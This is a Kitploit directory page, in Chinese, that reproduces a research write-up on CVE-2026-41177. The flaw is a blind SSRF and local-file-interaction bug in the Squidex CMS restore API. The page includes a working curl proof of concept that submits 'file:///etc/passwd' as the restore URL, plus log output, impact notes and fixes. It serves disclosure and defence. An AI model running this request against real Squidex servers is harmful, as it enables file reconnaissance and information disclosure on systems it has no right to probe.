Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/turkios/cve-2026-41177-squidex-cms
漏洞分析漏洞利用Web安全学习与教育
GitHubturkios/cve-2026-41177-squidex-cms

CVE-2026-41177-Squidex-CMS

CVE-2026-41177,Squidex CMS(v7.23.0 之前版本)中的一个盲 SSRF 漏洞。包含根本原因分析、复现步骤,以及关于本地文件交互(LFI)的影响评估。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
4个月前尚未审核
分享

CVE-2026-41177:Squidex CMS 盲SSRF

针对CVE-2026-41177的技术研究与分析:Squidex CMS Restore API中的一个盲服务器端请求伪造(SSRF)漏洞。

漏洞概述

  • CVE ID: CVE-2026-41177
  • 受影响组件: Squidex API:备份/恢复引擎(/api/apps/restore)
  • 受影响版本: < 7.23.0
  • 漏洞类型: 盲SSRF(CWE-918)、本地文件交互(CWE-73)

摘要

Squidex Restore API存在盲服务器端请求伪造(SSRF)漏洞。该应用程序未能验证用户提供的Url参数的URI方案,从而允许使用file://协议。这使经过身份验证的管理员能够强制后端服务器与本地文件系统进行交互,导致本地文件交互(LFI),并可能通过内部日志的侧信道分析泄露敏感系统信息。

详细信息

  1. 配置: 攻击者使用本地文件系统URI(例如,file:///etc/passwd)创建一个“恢复”作业。
  2. 触发: 攻击者向恢复端点提交POST请求。
  3. 执行: 后端接受该请求并将URL传递给后台工作进程(RestoreJob)。
  4. 虽然API响应是通用的,但内部服务器日志显示,服务器在因内容不是有效的ZIP归档而失败之前,成功打开并读取了该文件。
观察:
204 No Content

概念验证(PoC)

1. 恶意请求

运行以下curl命令(将<TOKEN>替换为有效的管理员令牌):

root@kitploit:~
curl -X POST http://localhost/api/apps/restore/ \
  -H 'Authorization: Bearer <TOKEN>' \
  -H 'Content-Type: application/json' \
  -d '{
    "Url": "file:///etc/passwd",
    "Name": "exploit-poc"
  }' -v

2. 通过日志进行验证

Squidex容器日志中的以下错误确认了内部文件交互:

root@kitploit:~
{
  "logLevel": "Error",
  "message": "Backup with job id 381bcfcb-3701-44d0-a8c8-ea43b3ec6271 from URL 'file:///etc/passwd' failed.",
  "exception": {
    "type": "System.IO.InvalidDataException",
    "message": "End of Central Directory record could not be found.",
    "stackTrace": "at System.IO.Compression.ZipArchive.ReadEndOfCentralDirectory()\n at System.IO.Compression.ZipArchive..ctor(Stream stream...)\n at Squidex.Domain.Apps.Entities.Backup.BackupReader..ctor(...) in BackupReader.cs:line 42\n at Squidex.Domain.Apps.Entities.Backup.TempFolderBackupArchiveLocation.OpenReaderAsync(...) in TempFolderBackupArchiveLocation.cs:line 57"
  }
}

注意:InvalidDataException确认服务器成功访问并读取了该文件的字节。

影响

此漏洞允许经过身份验证的攻击者:

  • 文件系统侦察: 确认敏感文件(例如,appsettings.json、密钥)的存在。
  • 信息泄露: 在多租户环境中,这可能被用来访问其他用户的备份文件。

修复建议

  • 更新: 升级到Squidex版本7.23.0或更高版本。
  • 协议白名单: 严格仅允许http://和https://方案。
  • 输入验证: 在处理之前实施检查,拒绝任何使用file://方案的URI。
  • 安全的IO处理: 确保底层处理程序对于用户提供的输入被限制为不进行本地文件系统解析。

参考

  • GitHub安全公告(GHSA-45fq-w37p-qfw5)
  • 官方CVE记录
下载工具